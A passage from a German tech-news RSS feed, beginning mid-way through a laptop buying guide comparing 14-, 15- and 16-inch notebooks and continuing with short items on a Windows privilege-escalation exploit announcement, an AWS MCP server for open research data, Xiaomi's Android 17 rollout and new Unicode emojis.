<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a578e3835916"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Lenovo-IdeaPad-Slim-3-Laptop-15.6.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Lenovo IdeaPad Slim 3 Laptop 15.6" class="wp-image-3169563" width="1200" height="997" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Lenovo </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0DSGB8C6M?tag=pcwelt.de-21&amp;ascsubtag=4-0-3169538-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3169538-7-0-0-0-0">Lenovo IdeaPad Slim 3 bei Amazon ansehen</a></div>


<p>Preis: ca. 682 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 15,6 Zoll (39,6 cm), Seitenverhältnis 16:10</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WUXGA (1920 × 1200 Pixel), LC-Display</li>



<li><strong>Gewicht &amp; Maße:</strong> ca. 1,6 kg, 17,9 mm Bauhöhe</li>



<li><strong>Prozessor &amp; Grafik:</strong> Intel Core i5-13420H, Intel UHD Grafik</li>



<li><strong>Speicher:</strong> 16 GB DDR5-RAM, 512 GB SSD</li>



<li><strong>Akkukapazität:</strong> 42 Wh</li>



<li><strong>Tastatur:</strong> QWERTZ-Layout mit integriertem Nummernblock</li>



<li><strong>Software &amp; Extras:</strong> Smart Connect, 3 Monate Lenovo Premium Care, 24 Monate Herstellergarantie</li>



<li><strong>Anschlüsse &amp; Konnektivität:</strong> 2 USB-Anschlüsse, HDMI, WLAN, Bluetooth</li>



<li><strong>Betriebssystem:</strong> Windows 11 Home</li>
</ul>



<p>Das <a href="https://www.amazon.de/dp/B0DSGB8C6M?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Lenovo IdeaPad Slim 3</a> (Modell: 15IRH10) richtet sich an Nutzer, die ein solides Notebook für Alltag, Studium und Homeoffice suchen. Mit seinem 15,6 Zoll großen WUXGA-Display im modernen 16:10-Format bietet es etwas mehr vertikale Arbeitsfläche als klassische 16:9-Modelle – ein Vorteil beim Arbeiten mit Dokumenten, Tabellen oder längeren Webseiten. Trotz der großzügigen Bildschirmfläche bleibt das Gerät mit rund 1,6 Kilogramm angenehm mobil.</p>



<p>Für die Rechenleistung sorgt ein Intel Core i5-13420H Prozessor, der zusammen mit 16 GB DDR5-Arbeitsspeicher genügend Reserven für Office-Anwendungen, Multitasking und alltägliche Multimedia-Aufgaben bietet. Anspruchsvolle Spiele oder grafikintensive Anwendungen sind hingegen nicht die Stärke dieses Modells, da ausschließlich die integrierte Intel-UHD-Grafik zum Einsatz kommt.</p>



<p>Praktisch im Alltag ist die Smart-Connect-Funktion von Lenovo, mit der sich kompatible Smartphones, Tablets und PCs einfacher miteinander verbinden und Daten austauschen lassen. Damit positioniert sich das IdeaPad Slim 3 klar als klassischer Allrounder für produktives Arbeiten zu Hause, im Büro oder im Studium.</p>



<h2 class="wp-block-heading">3. 16-Zoll-Laptops: Mobile Kraftpakete</h2>



<p>Der 16-Zöller (ca. 40,6 cm Diagonale) ist der moderne Nachfolger der alten, klobigen 15,6- und 17-Zoll-Workstations. Dank besonders schmaler Displayränder passen 16-Zoll-Bildschirme heute in Gehäuse, die früher für 15 Zoll reserviert waren. Fast alle Geräte in dieser Klasse setzen auf das höhere 16:10-Format, was beim Arbeiten spürbar mehr vertikale Bildschirmfläche (z. B. für Code-Zeilen oder Webseiten) bietet.</p>



<p>Der entscheidende Vorteil dieser Größe: Das große Gehäuse bietet reichlich Platz für leistungsstarke Kühlsysteme und große Akkus (bis zum gesetzlichen <a href="https://www.pcwelt.de/article/2946084/powerbank-im-flugzeug-was-ist-erlaubt.html" target="_blank" rel="noreferrer noopener">Flugzeug-Limit</a> von 99 Wattstunden). Hier finden leistungsstarke Prozessoren und dedizierte Grafikkarten deutlich bessere Kühlbedingungen als in kompakteren Gehäusen.</p>



<h3 class="wp-block-heading">Für wen eignet sich die 16-Zoll-Größe?</h3>



<p>Für Power-User, Content Creator (Foto/Video), ambitionierte Gamer und Nutzer, die den Laptop als vollwertigen Desktop-Ersatz (Desktop Replacement) nutzen möchten.</p>



<h2 class="wp-block-heading">HP Omen MAX Gaming Laptop (16″)</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a578e3836631"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Omen-MAX-Gaming-Laptop-16-Zoll-WQXGA-Display-240Hz.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Omen MAX Gaming Laptop, 16 Zoll WQXGA Display 240Hz," class="wp-image-3169567" width="1200" height="1124" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">HP</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0DYL4GQ19?tag=pcwelt.de-21&amp;ascsubtag=4-0-3169538-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3169538-7-0-0-0-0">HP Omen MAX Gaming Laptop bei Amazon ansehen</a></div>


<p>Preis: 2.199 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 16 Zoll (40,6 cm), Seitenverhältnis 16:10</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WQXGA (2560 × 1600 Pixel), IPS-Display</li>



<li><strong>Bildwiederholrate:</strong> 240 Hz</li>



<li><strong>Gewicht &amp; Maße:</strong> ca. 2,71 kg, 2,5 cm Bauhöhe</li>



<li><strong>Prozessor &amp; Grafik:</strong> AMD Ryzen AI 7 350 (bis zu 5,0 GHz)</li>



<li><strong>Grafik:</strong> integrierte AMD Radeon 860M Grafik und NVIDIA GeForce RTX 5070 Ti (12 GB VRAM)</li>



<li><strong>Speicher:</strong> 32 GB RAM, 1 TB SSD</li>



<li><strong>Akkukapazität:</strong> 83 Wh</li>



<li><strong>Tastatur:</strong> QWERTZ-Layout mit Hintergrundbeleuchtung und Nummernblock</li>



<li><strong>Anschlüsse &amp; Konnektivität:</strong> USB, HDMI, Ethernet, WLAN 7, Bluetooth 5.4</li>



<li><strong>Betriebssystem:</strong> Windows 11 Home</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0DYL4GQ19?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">HP Omen MAX Gaming Laptop</a> positioniert sich als leistungsstarkes 16-Zoll-Notebook für anspruchsvolles Gaming und Content Creation. Das WQXGA-Display (2560 × 1600 Pixel) mit 240 Hz Bildwiederholrate verspricht besonders flüssige Bewegungsdarstellung mit hoher Schärfe, während die IPS-Technologie für stabile Farbdarstellung sorgt.</p>



<p>Im Inneren arbeitet ein AMD Ryzen AI 7 350 Prozessor in Kombination mit einer NVIDIA GeForce RTX 5070 Ti mit 12 GB VRAM. Die Kombination liefert ausreichend Leistung für aktuelle AAA-Spiele, kreative Anwendungen und Multitasking auf hohem Niveau. Ergänzt wird die Ausstattung durch 32 GB Arbeitsspeicher sowie eine 1-TB-SSD für schnelle Ladezeiten und ordentlich Speicherplatz.</p>



<p>Mit einem 83-Wh-Akku und einem Gewicht von rund 2,7 Kilogramm ist das Gerät klar auf Leistung statt maximale Mobilität ausgelegt. Gleichzeitig bietet es eine umfangreiche Anschlussausstattung inklusive Ethernet, HDMI, USB und moderner WLAN-7-Konnektivität. Damit richtet sich dieser Laptop an Nutzer, die ein leistungsstarkes Gaming-Notebook mit Desktop-Anspruch suchen – und den Kaufpreis nicht scheuen.</p>



<h2 class="wp-block-heading">Welche Notebook-Größe passt zu mir?</h2>



<p>Die perfekte Notebook-Größe ist immer ein Kompromiss: Mehr Bildschirm bedeutet automatisch mehr Gewicht und weniger Mobilität. Die folgende Matrix hilft Ihnen dabei, Ihre eigenen Prioritäten zu gewichten und den optimalen Kompromiss für Ihren Alltag zu finden.</p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><tbody><tr><td><strong>Hauptfokus</strong></td><td><strong>Ideale Laptop-Größe</strong></td><td><strong>Der Kompromiss, den Sie dabei eingehen</strong></td></tr><tr><td><strong>Sie sind oft unterwegs (Bahn, Uni, Flieger)</strong></td><td><strong>14 Zoll</strong></td><td>Kleinerer Bildschirm; Multitasking erfordert gutes Fenster-Management.</td></tr><tr><td><strong>Sie arbeiten meistens mit einem externen Monitor</strong></td><td><strong>14 Zoll</strong></td><td>Unterwegs weniger Displayfläche, aber am Schreibtisch maximal flexibel und platzsparend.</td></tr><tr><td><strong>Sie suchen viel Leistung für wenig Geld (Homeoffice)</strong></td><td><strong>15 Zoll</strong></td><td>Oft ältere 16:9-Bildformate; Gehäuse sind meist etwas schwerer und dicker.</td></tr><tr><td><strong>Sie nutzen das Gerät primär auf der Couch oder im Bett</strong></td><td><strong>14 oder 15 Zoll</strong></td><td>16-Zöller sind für den Schoßbetrieb oft zu schwer und werden an den Unterseiten zu warm.</td></tr><tr><td><strong>Sie möchten Ihren Desktop-PC komplett ersetzen</strong></td><td><strong>16 Zoll</strong></td><td>Hohes Gewicht; wuchtiges Netzteil; saugt den Akku unterwegs schneller leer.</td></tr><tr><td><strong>Sie sind auf der Suche nach maximaler Gaming-Power oder Videoschnitt</strong></td><td><strong>16 Zoll</strong> <em>(oder teure 14″ Nische)</em></td><td>Hoher Anschaffungspreis; Lüfter werden unter Last deutlich hörbar.</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">Software-Tipps für Ihren Laptop-Alltag</h2>



<p>Egal, ob Sie sich für das kompakte 14-Zoll-Modell oder den 16-Zoll-Boliden entscheiden – mit diesen drei kostenlosen Software-Tools holen Sie noch mehr aus Ihrem mobilen Arbeitsplatz heraus:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/de-de/windows/powertoys/install?tabs=gh%2Cextract-094" target="_blank" rel="noreferrer noopener"><strong>Microsoft PowerToys (FancyZones)</strong></a><strong>:</strong> Gerade auf den kleineren 14-Zoll-Displays ist das Standard-Fensterlayout von Windows oft fummelig. Mit dem Modul <em>FancyZones</em> unterteilen Sie Ihren Bildschirm in feste, frei definierbare Raster, in die Sie Fenster mit gedrückter Shift-Taste blitzschnell einrasten lassen. Ein absolutes Must-Have für Multitasking auf kleinen Displays.</li>



<li><a href="https://www.spacedesk.net/de/" target="_blank" rel="noreferrer noopener"><strong>SpaceDesk</strong></a><strong>:</strong> Sie sind im Hotel und der 14-Zöller reicht nicht für die Excel-Tabelle aus? SpaceDesk ist eine geniale kostenlose Software, mit der Sie Ihr iPad oder Android-Tablet kabellos über WLAN als vollwertigen, zweiten Windows-Monitor nutzen können. Perfekt für das mobile Büro.</li>



<li><a href="https://www.voidtools.com/downloads/" target="_blank" rel="noreferrer noopener"><strong>Everything</strong></a><strong>:</strong> Laptops werden oft beruflich wie privat vollgepackt mit Dateien. Statt der langsamen Windows-Standard-Suche baut <em>Everything</em> einen superschnellen Index Ihrer Festplatte auf. Dateien, Fotos oder Dokumente werden in Echtzeit gefunden – buchstäblich schon während Sie den Dateinamen tippen.</li>
</ul>



<h2 class="wp-block-heading">Fazit: Welcher Laptop-Typ sind Sie?</h2>



<p>Das perfekte Notebook richtet sich nicht nach dem Geldbeutel, sondern nach dem Einsatzzweck. Wer primär pendelt, in verschiedenen Meetingräumen sitzt oder das Gerät täglich in die Vorlesung schleppt, wird mit einem <strong>14-Zoll-Laptop</strong> am glücklichsten. </p>



<p>Die gesparten Kilos auf dem Rücken rechtfertigen den kleineren Bildschirm allemal. Wer einen soliden Rechner für das Homeoffice sucht, nur selten verreist und beim Kauf auf das Budget achten muss, macht mit dem klassischen <strong>15-Zöller</strong> nichts falsch.</p>



<p>Wenn für Sie das Notebook jedoch den klobigen Desktop-PC unter dem Schreibtisch komplett ersetzen soll, Sie professionell Videos schneiden oder aktuelle AAA-Spiele flüssig spielen wollen, führt kein Weg am <strong>16-Zoll-Kraftpaket</strong> vorbei. Die massive Arbeitsfläche und das hervorragende Kühlpotenzial gleichen das stattliche Transportgewicht in diesem Fall problemlos auf.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Ein neuer Windows-Exploit namens LegacyHive zielt auf die User Profile Service-Komponente (ProfSvc) und ermöglicht das willkürliche Laden von Registry-Hives zur Privilegieneskalation. Der Proof-of-Concept ist laut den Angaben des Forschers unmittelbar nach dem Patch-Tuesday...]]></description>
<link>https://tsecurity.de/de/3670749/it-security-nachrichten/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670749/it-security-nachrichten/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar/</guid>
<pubDate>Wed, 15 Jul 2026 15:09:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Ein neuer Windows-Exploit namens LegacyHive zielt auf die User Profile Service-Komponente (ProfSvc) und ermöglicht das willkürliche Laden von Registry-Hives zur Privilegieneskalation. Der Proof-of-Concept ist laut den Angaben des Forschers unmittelbar nach dem Patch-Tuesday-Update verfügbar geworden – und soll auf allen aktuell unterstützten Windows-Desktop- und Serverversionen funktionieren. Parallel dazu häufen sich 2026 […]</p>
<div><a href="https://www.it-boltwise.de/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar.html">... den vollständigen Artikel <strong>»LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar.html">LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quelloffener MCP-Server von AWS beschleunigt Forschung]]></title>
<description><![CDATA[Mit einem quelloffenen MCP-Server will AWS die KI-gestützte Suche nach Forschungsergebnissen vereinfachen.
hafakot/Shutterstock.com



Auf dem UN-Gipfel „AI for Good“ in Genf hat Amazon Web Services (AWS) eine technologische Brücke vorgestellt, die die wissenschaftliche Arbeit revolutionieren kön...]]></description>
<link>https://tsecurity.de/de/3670664/it-security-nachrichten/quelloffener-mcp-server-von-aws-beschleunigt-forschung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670664/it-security-nachrichten/quelloffener-mcp-server-von-aws-beschleunigt-forschung/</guid>
<pubDate>Wed, 15 Jul 2026 14:38:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/shutterstock_2661455173_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AI" class="wp-image-4197329" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Mit einem quelloffenen MCP-Server will AWS die KI-gestützte Suche nach Forschungsergebnissen vereinfachen.</p>
</figcaption></figure><p class="imageCredit">hafakot/Shutterstock.com</p></div>



<p class="wp-block-paragraph">Auf dem UN-Gipfel „<a href="https://aiforgood.itu.int/">AI for Good</a>“ in Genf hat Amazon Web Services (AWS) eine technologische Brücke vorgestellt, die die wissenschaftliche Arbeit revolutionieren könnte. Ein neuer, quelloffener Server auf Basis des <a href="https://www.computerwoche.de/article/4031227/was-ist-model-context-protocol.html?">Model Context Protocol (MCP)</a> verbindet KI-Assistenten direkt mit der <a href="https://www.computerwoche.de/article/4153009/mcp-registry-aufbauen-so-gehts.html?">Registry of Open Data (RODA)</a> auf AWS.</p>



<p class="wp-block-paragraph">RODA ist eine der weltweit größten Sammlungen frei zugänglicher Forschungsdaten. Sie umfasst über 1.100 Datensätze von mehr als 400 Organisationen, darunter Schwergewichte wie die NASA, die <a href="https://www.noaa.gov/">NOAA</a> und die National Institutes of Health (NIH).</p>



<h2 class="wp-block-heading">Natürliche Sprache statt kryptischer Befehle</h2>



<p class="wp-block-paragraph">Damit will AWS eine Demokratisierung des Datenzugangs einläuten. Forscher müssen keine Experten für Datenbankstrukturen oder Cloud-Speicher (wie Amazon S3) mehr sein. Stattdessen können sie, wie es heißt, Coding-Assistenten wie <a href="https://www.computerwoche.de/article/4175182/4-tools-fur-spec-driven-development.html?utm=hybrid_search">Kiro</a> oder <a href="https://code.claude.com/docs">Claude Code</a> nutzen, um ihre Fragen in natürlicher Sprache zu stellen.</p>



<p class="wp-block-paragraph">So soll eine Anfrage wie „Welche Satellitenbilddaten gibt es zur Überwachung von Entwaldung?“ ausreichen, um sofort präzise Ergebnisse inklusive Beschreibungen und Datenvorschauen zu erhalten. Dabei fungiert der MCP-Server als intelligenter Vermittler, der den gesamten Katalog durchsucht, Metadaten inspiziert und sogar Dateiinhalte stichprobenartig prüft, um die Eignung für ein Projekt zu bewerten.</p>



<p class="wp-block-paragraph">Auch Deutschland ist bereits stark in diesem Ökosystem vertreten. Organisationen wie die Audi AG, das Helmholtz-Zentrum Hereon und der Max-Planck-Campus Tübingen stellen bereits Datensätze zur Verfügung.</p>



<h2 class="wp-block-heading">Einsatzszenarien</h2>



<p class="wp-block-paragraph">Ein entscheidender Aspekt der Initiative ist der Open-Source-Gedanke. Der MCP-Server steht unter der Apache-2.0-Lizenz frei auf GitHub zur Verfügung. Damit haben Forscher weltweit – unabhängig von der Größe oder den finanziellen Ressourcen ihrer Institution – Zugriff auf dieselben mächtigen Werkzeuge wie Elite-Universitäten.</p>



<p class="wp-block-paragraph">Laut AWS unterstützt das Tool zentrale Forschungsfelder wie:</p>



<ul class="wp-block-list">
<li>die Nachverfolgung von Krankheitsausbrüchen;</li>



<li>das Monitoring von Biodiversitätsverlusten;</li>



<li>die Genomforschung und Biowissenschaften; oder</li>



<li>die Modellierung des Meeresspiegelanstiegs.</li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese Nicht-Pixel-Smartphones erhalten jetzt das Android-17-Update]]></title>
<description><![CDATA[Nach der Einführung von Android 17 auf Google-Pixel-Smartphones wird das Betriebssystem nun auch auf Geräte anderer Marken ausgerollt, wenn auch bislang noch nicht in großem Umfang (Android 17: Diese Smartphones bekommen das Update nicht mehr).



Google-Smartphones ab dem Pixel 6 verfügen jetzt ...]]></description>
<link>https://tsecurity.de/de/3670555/it-nachrichten/diese-nicht-pixel-smartphones-erhalten-jetzt-das-android-17-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670555/it-nachrichten/diese-nicht-pixel-smartphones-erhalten-jetzt-das-android-17-update/</guid>
<pubDate>Wed, 15 Jul 2026 14:02:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nach der <a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Einführung von Android 17 auf Google-Pixel-Smartphones</a> wird das Betriebssystem nun auch auf Geräte anderer Marken ausgerollt, wenn auch bislang noch nicht in großem Umfang (<a href="https://www.pcwelt.de/article/3129020/android-17-diese-smartphones-geraete-bekommen-das-update-nicht-mehr-liste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update nicht mehr)</a>.</p>



<p>Google-Smartphones ab dem Pixel 6 verfügen jetzt über die stabile Version von Android 17, und Xiaomi ist die erste Drittanbieter-Marke, die mit der Einführung begonnen hat. Allerdings benötigen Sie zum Zeitpunkt der Erstellung dieses Artikels eines von zwei Modellen, um das Update erhalten zu können: das <a href="https://www.pcwelt.de/article/3078239/xiaomi-17-test.html" target="_blank" rel="noreferrer noopener">Xiaomi 17</a> oder das <a href="https://www.pcwelt.de/article/3131894/xiaomi-17-ultra-test.html" target="_blank" rel="noreferrer noopener">17 Ultra.</a></p>



<p>Dies sind zwei der neuesten Flaggschiff-Geräte von Xiaomi, obwohl seltsamerweise das 17 Pro und das 17 Pro Max laut <a href="https://ximitime.com/xiaomi-starts-hyperos-3-3-android-17-public-rollout-for-xiaomi-17-series-98749/" target="_blank" rel="noreferrer noopener">XimiTimes</a> vorerst nicht berücksichtigt zu sein scheinen.</p>



<p>Ich kann bestätigen, dass das Update für mein Testgerät, das 17 Ultra, tatsächlich verfügbar ist (wie Sie oben sehen können). Es wird als HyperOS „3.0.332“ aufgeführt und hat eine Downloadgröße von satten 9,6 GB (für das reguläre 17-Modell soll die Größe mit 7,5 GB geringer sein).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5776aaad9b3"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/Xiaomi-17-REVIEW-back-angled.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Xiaomi 17 REVIEW back angled" class="wp-image-3073865" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Foundry | Alex Walker-Todd</p></div>



<p>Seltsamerweise wird Android 17 auf der Update-Seite überhaupt nicht erwähnt; dort heißt es lediglich, dass das Update der Verbesserung der Systemstabilität und der Benutzererfahrung sowie der Aktualisierung auf den Sicherheitspatch vom Juni 2026 dient.</p>



<p>Erst nach Abschluss des Updates bestätigt der Abschnitt „Über das Telefon“ in den Einstellungen, dass es sich tatsächlich um Android 17 handelt – und das ist wahrscheinlich auch gut so, denn sonst würden Sie sich vielleicht zu große Hoffnungen machen.</p>



<p>Da HyperOS 3 die firmeneigene Software von Xiaomi ist, unterscheidet es sich beispielsweise von der Version auf Pixel-Smartphones und verfügt über unternehmenseigene Funktionen. Xiaomi könnte die Funktionen von Google hinzufügen, doch es scheint keine Neuerungen wie App-Bubbles, Reaktionen bei Bildschirmaufzeichnungen oder separate Lautstärkeregler für Gemini zu geben.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><a href="https://www.pcwelt.de/article/3174509/ich-habe-android-17-getestet-mein-knallhartes-fazit-nach-einer-woche.html" target="_blank" rel="noreferrer noopener">Ich habe Android 17 getestet – Mein deprimierendes Fazit nach einer Woche</a></p>
</blockquote>



<p>In der Zwischenzeit müssen Besitzer anderer Android-Smartphone-Marken auf Android 17 warten. Es sieht so aus, als wäre Samsung als Nächstes an der Reihe, da One UI 9 (basierend auf Android 17) voraussichtlich auf der „Galaxy Unpacked“-Veranstaltung am 22. Juli vorgestellt und kurz darauf ausgerollt wird.</p>



<p>Im Rahmen der Veranstaltung wird Samsung seine Faltgeräte für das Jahr 2026 vorstellen, darunter das <a href="https://www.pcwelt.de/article/3140139/samsung-galaxy-z-fold-8-leak.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 8</a> in einem neuen, breiten Formfaktor, das dem iPhone Ultra Konkurrenz machen soll, sowie eine neue Generation von Galaxy Watch-Wearables.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unicode stellt neue Emojis vor – und erklärt, warum manche davon bekannt wirken]]></title>
<description><![CDATA[Unicode hat jetzt neun neue Emojis vorgestellt, die Teil von Emoji 18.0 sind. Zu den Neuheiten gehören ein lächelnder Smiley mit einem Riss im Mund, ein Daumen nach links und einer nach rechts, ein Monarchfalter, eine eingelegte Gurke, ein Leuchtturm, ein Meteor, ein Radiergummi und ein Kescher.
...]]></description>
<link>https://tsecurity.de/de/3670493/it-nachrichten/unicode-stellt-neue-emojis-vor-und-erklaert-warum-manche-davon-bekannt-wirken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670493/it-nachrichten/unicode-stellt-neue-emojis-vor-und-erklaert-warum-manche-davon-bekannt-wirken/</guid>
<pubDate>Wed, 15 Jul 2026 13:32:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



